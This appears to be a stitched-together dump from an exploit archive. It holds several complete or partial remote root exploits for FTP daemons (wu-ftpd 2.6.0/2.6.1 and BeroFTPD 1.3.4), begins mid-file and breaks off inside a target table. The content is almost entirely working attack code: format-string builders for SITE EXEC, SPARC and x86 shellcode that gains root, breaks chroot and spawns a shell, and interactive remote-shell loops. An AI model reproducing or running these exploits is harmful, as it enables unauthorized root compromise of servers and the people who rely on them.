xfree(char **ptr)
{
if (!ptr || !*ptr)
return;
free(*ptr);
*ptr = NULL;
}
char *
xmalloc(size_t size)
{
char *heidegger_was_a_boozy_beggar;
if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) {
fprintf(stderr, "Out of cheese error\n");
exit(-1);
}
return (heidegger_was_a_boozy_beggar);
}
int
xconnect(char *host, u_short port)
{
struct hostent *he;
struct sockaddr_in s_in;
int fd;
if ((he = gethostbyname(host)) == NULL) {
perror("gethostbyname");
return (-1);
}
memset(&s_in, 0, sizeof(s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
return (-1);
}
if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) {
perror("connect");
return (-1);
}
return fd;
}
/* returns status from ftpd */
void
ftp_login(int fd, char *user, char *password)
{
char reply[512];
int rep;
xrecieveall(fd, reply, sizeof(reply));
if (verbose) {
printf("Logging in ..\n");
printf("%s\n", reply);
}
xsendftpcmd(fd, "USER", user);
xrecieveall(fd, reply, sizeof(reply));
if (verbose)
printf("%s\n", reply);
xsendftpcmd(fd, "PASS", password);
xrecieveall(fd, reply, sizeof(reply));
if (verbose)
printf("%s\n", reply);
if (reply[0] != '2') {
printf("Login failed.\n");
exit(-1);
}
}
void
xsendftpcmd(int fd, char *command, char *param)
{
xsend(fd, command);
if (param != NULL) {
xsend(fd, " ");
xsend(fd, param);
}
xsend(fd, "\r\n");
}
void
xsend(int fd, char *buf)
{
if (send(fd, buf, strlen(buf), 0) != strlen(buf)) {
perror("send");
exit(-1);
}
}
void
xrecieveall(int fd, char *buf, int size)
{
char scratch[6];
if (buf == NULL || size == 0) {
buf = scratch;
size = sizeof(scratch);
}
memset(buf, 0, size);
do {
xrecieve(fd, buf, size);
} while (buf[3] == '-');
}
/* recieves a line from the ftpd */
void
xrecieve(int fd, char *buf, int size)
{
char *end;
char ch;
end = buf + size;
while (buf < end) {
if (read(fd, buf, 1) != 1) {
perror("read"); /* XXX */
exit(-1);
}
if (buf[0] == '\n') {
buf[0] = '\0';
return;
}
if (buf[0] != '\r') {
buf++;
}
}
buf--;
while (read(fd, buf, 1) == 1) {
if (buf[0] == '\n') {
buf[0] = '\0';
return;
}
}
perror("read"); /* XXX */
exit(-1);
}
// [2000-12-20]
21 wu-ftpd 2.6.0 Remote Format Strings Exploit
/*
**
** 12:40 11/10/00: Tool for either attack or defense
** within an information warfare setting. Rather, it
** is a small program demonstrating proof of concept.
** Default values for solaris 2.8 and inetd.
**
** If you are not the intended recipient, or a person
** responsible for delivering it to the intended
** recipient, you are not authorised to and must not
** disclose, copy, distribute, or retain this message
** or any part of it. Such unauthorised use may be
** unlawful.If you have received this transmission in
** error,please email us immediately at [email protected]
** so that we can arrange for its return.
**
** kalou <[email protected]>
**
** Usage:
**
** 0xfdc (4060) bytes after the ret position, you have:
**
** -HOSTNAME: anonymous/EGGSHELL
**
** This of course begins on a 4 bytes boundary.
**
** Check your hostname len. Align this with pad to have EGGSHELL on a
** 4 bytes boundary (-p). Localhost needs 2 bytes, for example.
**
** Use '%s' format bug exploitation to look for this string in memory.
** (you have to eat 15 words out of stack).
**
** Remove 0xfdc + len (-HOSTNAME: anonymous/pad) to your found pointer.
** This substracted value is kept as the distance (-d).
** Result is your return address position (-w). Check it if you want.
**
** This code substracts 8 to this address (sparc ret behaviour).
**
** You may use the 102th %p pointer on stack to find the string. eg: ffbef640.
**
** adding 0x870 to this value, I found my string.
**
** offset should be useless. site_padding depends on the '/bin/ftp-exec/'
** config stuff.
**
** (./wu -p 2 -d 0xff4 ; cat ) | nc localhost 21
**
*/
/* Stolener Foundation */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef __linux
#include <getopt.h>
#endif
void *build_format_string(int where,
int what,
int gout,
int eat,
int pad)
{
int expected_len;
int what1, where1;
int what2, where2;
char w1[512];
char w2[512];
int i;
char *buf, *p;
/* generate two %hn len : */
what1 = (what >> 16) & 0xffff;
what2 = what & 0xffff;
fprintf(stderr, "what1: %0x\n", what1);
fprintf(stderr, "what2: %0x\n", what2);
if ( what1 > what2 ) {
where1 = where + 2;
where2 = where;
what1 -= what2;
} else {
where1 = where;
where2 = where + 2;
what2 -= what1;
}
fprintf(stderr, "removing %d.\n", pad + 2 * sizeof(where) + gout +
(eat - 1) * 12);
if (where1 < where2) {
what1 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;
} else {
what2 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;
}
fprintf(stderr, "%08x: writing first %s\n", what,
(where1 > where2) ? "what2" : "what1");
fprintf(stderr, "what1 is %08x, what2 is %08x\n",
what1, what2);
sprintf(w1, "%%0%dx%%hn", what1);
sprintf(w2, "%%0%dx%%hn", what2);
fprintf(stderr, "1: %s\n2: %s\n", w1, w2);
/* calculate expected len : */
expected_len = pad + 12 + (eat - 1) * 8
+ strlen(w1) + strlen(w2) + 1;
fprintf(stderr, "len is %d\n", expected_len);
buf = (char *) malloc(expected_len);
if ( buf == NULL)
return buf;
p = buf;
/* pad */
for (i = 0; i < pad; i++) {
*p++ = '.';
}
/* retaddr, part 1 - first %hn*/
*p++ = (where1 >> 24) & 0xff;
*p++ = (where1 >> 16) & 0xff;
*p++ = (where1 >> 8) & 0xff;
*p++ = (where1) & 0xff;
*p++ = 0x0f;
*p++ = 0x0e;
*p++ = 0x0e;
*p++ = 0x0f; /* so that the first %0(much)x eats something
/* retaddr, part 2 - second %hn */
*p++ = ((where2) >> 24) & 0xff;
*p++ = ((where2) >> 16) & 0xff;
*p++ = ((where2) >> 8) & 0xff;
*p++ = (where2) & 0xff;
/* eaters.. */
for (i = 0; i < (eat - 1); i++) {
strcpy(p, "%000012x");
p += 8;
}
/* what1, what2 */
if (what1 > what2) {
strcpy(p, w1);
strcpy(p + strlen(w1), w2);
} else {
strcpy(p, w2);
strcpy(p + strlen(w2), w1);
}
return buf;
}
void *ftp_escape(void *buf)
{
void *boh;
char *p = buf;
char *r;
boh = malloc(4096);
r = boh;
while (*p) {
*r++ = *p;
if ((*p) == '\xff')
*r++ = *p;
p++;
}
*r = '\0';
return boh;
}
void usage(char *me)
{
fprintf(stderr, "Usage : %s \n"
" [-w where (hexa) ] /* ret position */\n"
" 0 [-o offset ] /* or just offset, or both */\n"
"1010 [-d distance (hex)] /* distance to pass */\n"
" 2 [-s site_pad ] /* padding to site_exec */\n"
" 3 [-p pass_pad ] /* padding to eggshell */\n"
" 4 [-g gout ] /* output size (200-) */\n"
" 15 [-e eat ] /* pointers to eat */\n\n\n",
me);
exit(0);
}
main(int argc, char **argv)
{
char c;
int where, offset, distance, gout, site_pad, pass_pad, eat;
char *buf;
char break_sparc[] =
"\x90\x1b\xc0\x0f" // xor %o7, %o7, %o0
"\x82\x10\x20\x17" // mov 23, %g1
"\x91\xd0\x20\x08" // ta 8 ! setuid(0)
"\xae\x10\x20\x2e" // mov 0x2e, %l7
"\xaf\x2d\xe0\x18" // sll %l7, 24, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ]
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x82\x10\x20\x05" // mov 5, %g1
"\x92\x1b\xc0\x0f" // xor %o7, %o7, %o1
"\x91\xd0\x20\x08" // ta 8 ! fd = open(".", 0);
"\xa6\x82\x20\x01" // addcc %o0, 1, %l3 !
"\xae\x10\x20\x6b" // mov 0x6b, %l7
"\xaf\x2d\xe0\x18" // sll %l7, 24, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ]
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x92\x10\x21\xff" // mov 0x1ff, %o1
"\x82\x10\x20\x50" // mov 0x50, %g1
"\x91\xd0\x20\x08" // ta 8 ! mkdir("k", 0755)
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x82\x10\x20\x3d" // mov 0x3d, %g1
"\x91\xd0\x20\x08" // ta 8 ! chroot("k")
"\x90\x24\xe0\x01" // sub %l3, 1, %o0
"\x82\x10\x20\x78" // mov 0x78, %g1
"\x91\xd0\x20\x08" // ta 8 ! fchdir(fd)
"\x2f\x0b\x8b\x8b" // sethi %hi(0x2e2e2c00), %l7
"\xae\x15\xe3\x2e" // or %l7, 0x32e, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ] ! ../.
"\x2f\x0b\xcb\x8b" // sethi %hi(0x2f2e2c00), %l7
"\xae\x15\xe2\x2f" // or %l7, 0x22f, %l7
"\xee\x23\xbf\xd4" // st %l7, [ %sp - 44 ] ! /../
"\xee\x23\xbf\xd8" // st %l7, [ %sp - 40 ]
"\xee\x23\xbf\xdc" // st %l7, [ %sp - 36 ]
"\xee\x23\xbf\xe0" // st %l7, [ %sp - 32 ]
"\xee\x23\xbf\xe4" // st %l7, [ %sp - 28 ]
"\xee\x23\xbf\xe8" // st %l7, [ %sp - 24 ]
"\xee\x23\xbf\xec" // st %l7, [ %sp - 20 ] ! .././..//..//../(ad lib)
"\xc0\x23\xbf\xf0" // clr [ %sp - 16 ]
"\x82\x10\x20\x0c" // mov 0xc, %g1
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x91\xd0\x20\x08" // ta 8 ! chdir(".././../...")
"\xae\x10\x20\x2e" // mov 0x2e, %l7
"\xaf\x2d\xe0\x18" // sll %l7, 24, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ] ! stupido. anyway.
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x82\x10\x20\x3d" // mov 0x3d, %g1
"\x91\xd0\x20\x08" // ta 8
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f62696e), %l6 ! no more mine.
"\xac\x15\xa1\x6e" // or %l6, %lo(0x2f62696e), %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\x94\x1b\xc0\x0f" // xor %o7, %o7, %o2
"\x9c\x03\xa0\x10" // add %sp, 16, %sp
"\xec\x3b\xbf\xf0" // std %l6, [%sp-16]
"\xd0\x23\xbf\xf8" // st %o0, [%sp-8]
"\xc0\x23\xbf\xfc" // st %g0, [%sp-4]
"\x82\x10\x20\x3b" // mov 59, %g1
"\x91\xd0\x20\x08" // ta 8
"\x91\xd0\x20\x08"; // ta 8
offset = 0;
where = 0xffbeeed4;
distance = 0x1004;
gout = 4;
eat = 15;
site_pad = 2;
pass_pad = 3;
while ( ( c = getopt(argc, argv, "w:o:d:e:g:s:p:") ) != EOF ) {
switch(c) {
case 'w':
where = strtoul(optarg, NULL, 16);
break;
case 'o':
offset = atoi(optarg);
break;
case 'd':
distance = strtoul(optarg, NULL, 16);
break;
case 'e':
eat = atoi(optarg);
break;
case 'g':
gout = atoi(optarg);
break;
case 's':
site_pad = atoi(optarg) % 4;
break;
case 'p':
pass_pad = atoi(optarg) % 4;
break;
default:
usage(argv[0]);
}
}
where += offset;
fprintf(stderr, "ret [%x]:%x\n"
"ppad %d\n"
"spad %d\n"
"gout %d\n"
"eat %d\n",
where, where + distance,
pass_pad, site_pad, gout, eat);
printf("user ftp\n");
buf = ftp_escape(break_sparc);
printf("pass %.*s%s\n", pass_pad, "xxxx", buf);
buf = build_format_string(where, where + distance - 8, gout, eat, site_pad);
buf = ftp_escape(buf);
printf ("site exec %s\n", buf);
}
// [2001-01-03]
21 BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit
/*
* BeroFTPD 1.3.4(1) Linux x86 remote root exploit
* by qitest1 - 5/05/2001
*
* BeroFTPD is an ftpd derived from wuftpd sources. This code
* exploits the format bug of the site exec cmd, well known to be
* present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1)
* is the current version at the moment.
*
* JUST SAMPLE CODE. For different platforms you have to try with
* different offsets for different retaddrs. You see.. =)
*
* Greets: Nail, Norby, Berserker.
* 69 rulez.. ;P
*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>
struct targ
{
int def;
char *descr;
unsigned long int enbuf;
int dawlen;
};
struct targ target[]=
{
{0, "RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz", 0xded, 6},
{1, "Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz", 0x1170, 12},
{2, "Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm", 0xdf1, 6},
{69, NULL, 0, 0}
};
/* 15 byte x86/linux PIC read() shellcode by lorian / teso
*/
unsigned char shellcode_read[] =
"\x33\xdb" /* xorl %ebx, %ebx */
"\xf7\xe3" /* mull %ebx */
"\xb0\x03" /* movb $3, %al */
"\x8b\xcc" /* movl %esp, %ecx */
"\x68\xb2\x00\xcd\x80" /* push 0x80CDxxB2 */
"\xff\xff\xe4"; /* jmp %esp */
unsigned char shellcode[] = /* Lam3rZ code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
"\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b"
"\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66"
"\xb9\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89"
"\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0"
"\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08"
"\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0"
"\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8"
"\x90\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
char fmtstr[1024];
int sock;
int sel;
int offset;
unsigned long int retloc;
unsigned long int bufaddr;
unsigned long int tmpaddr;
void fmtstr_build(unsigned long int bufaddr, unsigned long int retloc);
void xpad_cat (unsigned char *fabuf, unsigned long int addr);
void retloc_find(void);
void shellami(int sock);
void login(void);
void usage(char *progname);
int conn2host(char *host, int port);
main(int argc, char *argv[])
{
char rbuf[1024];
char *host = NULL;
int cnt;
printf("\n BeroFTPD 1.3.4(1) exploit by qitest1\n\n");
if(argc == 1)
usage(argv[0]);
while((cnt = getopt(argc,argv,"h:t:o:")) != EOF)
{
switch(cnt)
{
case 'h':
host = strdup(optarg);
break;
case 't':
sel = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL)
usage(argv[0]);
printf("+Host: %s\n as: %s\n", host, target[sel].descr);
printf("+Connecting to %s...\n", host);
sock = conn2host(host, 21);
printf(" connected\n");
printf("+Receiving banner...\n");
recv(sock, rbuf, 1024, 0);
printf("%s", rbuf);
memset(rbuf, 0, 1024);
printf(" received\n");
printf("+Logging in...\n");
login();
printf(" logged in\n");
printf("+Searching retloc...\n");
retloc_find();
printf(" found: %p\n", retloc);
printf("+Searching bufaddr...\n");
bufaddr = tmpaddr + target[sel].enbuf;
printf(" found: %p + offset = ", bufaddr);
bufaddr += offset;
printf("%p\n", bufaddr);
printf("+Preparing shellcode...\n");
shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);
printf(" shellcode ready\n");
printf("+Building fmtstr...\n");
fmtstr_build(bufaddr, retloc);
printf(" fmtstr builded\n");
printf("+Sending fmtstr...\n");
send(sock, fmtstr, strlen(fmtstr), 0);
printf(" fmtstr sent\n");
recv(sock, rbuf, 1024, 0);
sleep(1);
send(sock, shellcode, strlen(shellcode), 0);
sleep(2);
printf("+Entering love mode...\n"); /* Nail teachs.. ;-) */
shellami(sock);
}
void
fmtstr_build(unsigned long int bufaddr, unsigned long int retloc)
{
int i;
int eat = 136;
int wlen = 428;
int tow;
int freespz;
char f[1024];
unsigned long int soul69 = 0x69696969; /* That's amore.. =) */
unsigned char retaddr[4];
for(i = 0; i < 4; ++i)
retaddr[i] = (bufaddr >> (i << 3)) & 0xff;
wlen -= target[sel].dawlen;
f[0] = 0;
for(i = 0; i < eat; i++)
strcat(f, "%.f");
strcat(fmtstr, "SITE EXEC ");
strcat(fmtstr, " ");
xpad_cat(fmtstr, retloc);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 1);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 2);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 3);
strcat(fmtstr, f);
strcat(fmtstr, "%x");
/* Code by teso
*/
tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
/* End here
*/
freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;
for(i = 0; i < freespz ; i++)
strcat(fmtstr, "\x90");
strcat(fmtstr, shellcode_read);
strcat(fmtstr, "\n");
}
/* Code by teso
*/
void xpad_cat (unsigned char *fabuf, unsigned long int addr)
{
int i;
unsigned char c;
for (i = 0 ; i <= 3 ; ++i) {
switch (i) {
case (0):
c = (unsigned char) ((addr & 0x000000ff) );
break;
case (1):
c = (unsigned char) ((addr & 0x0000ff00) >> 8);
break;
case (2):
c = (unsigned char) ((addr & 0x00ff0000) >> 16);
break;
case (3):
c = (unsigned char) ((addr & 0xff000000) >> 24);
break;
}
if (c == 0xff)
sprintf (fabuf + strlen (fabuf), "%c", c);
sprintf (fabuf + strlen (fabuf), "%c", c);
}
return;
}
/* End here
*/
void
retloc_find(void)
{
int i;
char rbuf[1024];
char sbuf[1024];
char *ptr;
strcpy(sbuf, "SITE EXEC ");
for(i = 0; i < 6; i++)
strcat(sbuf, "%p ");
strcat(sbuf, "\n");
send(sock, sbuf, strlen(sbuf), 0);
recv(sock, rbuf, 1024, 0);
ptr = rbuf;
for(i = 0; i < 5; i++)
{
while(*ptr != ' ')
ptr++;
ptr++;
}
ptr[strlen(ptr) - 2] = '\x00';
ptr[strlen(ptr) - 1] = '\x00';
sscanf(ptr, "%p", &retloc);
sscanf(ptr, "%p", &tmpaddr);
retloc -= 0x40;
}
void
shellami(int sock)
{
int n;
char recvbuf[1024];
char *cmd = "id; uname -a\n";
fd_set rset;
send(sock, cmd, strlen(cmd), 0);
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
n=read(sock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed by foreign host.\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(sock,recvbuf,n);
}
}
}
return;
}
int
conn2host(char *host, int port)
{
int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;
if ((he=gethostbyname(host)) == NULL)
{
herror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("connect");
exit(1);
}
return(sockfd);
}
void
login(void)
{
char *user = "USER anonymous\n";
char *pass = "PASS guest@\n";
char rbuf[1024];
send(sock, user, strlen(user), 0);
recv(sock, rbuf, 1024, 0);
memset(rbuf, 0, 1024);
send(sock, pass, strlen(pass), 0);
while(strstr(rbuf, "login ok") == NULL)
{
memset(rbuf, 0, 1024);
recv(sock, rbuf, 1024, 0);
}
}
void
usage(char *progname)
{
int i = 0;
printf("Usage: %s [options]\n", progname);
printf("Options:\n"
" -h hostname\n"
" -t target\n"
" -o offset\n"
"Available targets:\n");
while(target[i].def != 69)
{
printf(" %d) %s\n", target[i].def, target[i].descr);
i++;
}
exit(1);
}
// [2001-05-08]
21 wu-ftpd <= 2.6.1 Remote Root Exploit
/* 7350wurm - x86/linux wu_ftpd remote root exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
************************************************** ***************************
* thanks to bnuts, tomas, dvorak, scrippie and max for hints, discussions and
* ideas (synnergy.net rocks, thank you buddies ! :).
*/
#define VERSION "0.2.2"
/* TODO 1. fix chroot break on linux 2.4.x (x >= 13?)
* (ptrace inject on ppid())
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <time.h>
#define INIT_CMD "unset HISTFILE;id;uname -a;\n"
/* shellcodes
*/
unsigned char x86_lnx_loop[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\xfe";
/* x86/linux write/read/exec code (41 bytes)
* does: 1. write (1, "\nsP\n", 4);
* 2. read (0, ncode, 0xff);
* 3. jmp ncode
*/
unsigned char x86_wrx[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
"\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
"\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
"\x80\xeb\x05\xe8\xed\xff\xff\xff";
unsigned char x86_lnx_execve[] =
/* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
* code by lorian / teso
*/
"\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
"\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
"\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
"\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
"\x80"
/* 34 byte x86 linux argv code -sc
*/
"\xeb\x1b\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
"\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
"\xe1\xb0\x0b\xcd\x80\xe8\xe0\xff\xff\xff";
/* setreuid/chroot/execve
* lorian / teso */
unsigned char x86_lnx_shell[] =
/* TODO: fix chroot break on 2.4.x series (somewhere between 2.4.6 and
* 2.4.13 they changed chroot behaviour. maybe to ptrace-inject
* on parent process (inetd) and execute code there. (optional)
*/
"\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
"\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
"\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
"\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
"\x80"
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
typedef struct {
char * desc; /* distribution */
char * banner; /* ftp banner part */
unsigned char * shellcode;
unsigned int shellcode_len;
unsigned long int retloc; /* return address location */
unsigned long int cbuf; /* &cbuf[0] */
} tgt_type;
tgt_type tmanual = {
"manual values",
"unknown banner",
x86_wrx, sizeof (x86_wrx) - 1,
0x41414141, 0x42424242
};
tgt_type targets[] = {
{ "Caldera eDesktop|eServer|OpenLinux 2.3 update "
"[wu-ftpd-2.6.1-13OL.i386.rpm]",
"Version wu-2.6.1(1) Wed Nov 28 14:03:42 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e2b0, 0x080820a0 },
{ "Debian potato [wu-ftpd_2.6.0-3.deb]",
"Version wu-2.6.0(1) Tue Nov 30 19:12:53 CET 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db00, 0x0807f520 },
{ "Debian potato [wu-ftpd_2.6.0-5.1.deb]",
"Version wu-2.6.0(1) Fri Jun 23 08:07:11 CEST 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db80, 0x0807f5a0 },
{ "Debian potato [wu-ftpd_2.6.0-5.3.deb]",
"Version wu-2.6.0(1) Thu Feb 8 17:45:47 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db80, 0x0807f5a0 },
{ "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
"Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e7a0, 0x0807ffe0 },
{ "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
"Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x080713e0, 0x08082e00 },
{ "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
"Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x08072bd4, 0x08086400 },
{ "Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]",
"Version wu-2.6.1(1) Mon Jan 15 20:52:49 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f7f0, 0x08082600 },
{ "Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]",
"Version wu-2.6.1(1) Wed Jan 10 07:07:00 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x08071850, 0x08084660 },
{ "Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]",
"Version wu-2.6.1(1) Sun Sep 9 16:30:24 CEST 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806fec4, 0x08082b40 },
{ "RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jan 18 19:19:31 EST 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x08061cf0, 0x08068540 }, /* XXX: manually found */
{ "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Aug 3 19:17:20 EDT 1998",
x86_wrx, sizeof (x86_wrx) - 1,
0x08061c48, 0x08068490 }, /* XXX: manually found */
{ "RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]",
"Version wu-2.6.0(1) Fri Jun 23 09:22:33 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806b530, 0x08076550 }, /* XXX: manually found */
#if 0
/* XXX: not exploitable using synnergy.net method. (glob code
* does not handle {.,.,.,.}
*/
{ "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.i386.rpm]",
"Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x08069f04, 0x08079f60 },
#endif
{ "RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]",
"Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e620, 0x080803e0 },
{ "RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]",
"Version wu-2.6.0(1) Fri Jun 23 09:17:44 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x08070538, 0x08083360 },
{ "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
"Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806cb88, 0x0807cc40 },
{ "RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]",
"Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e1a0, 0x0807fbc0 },
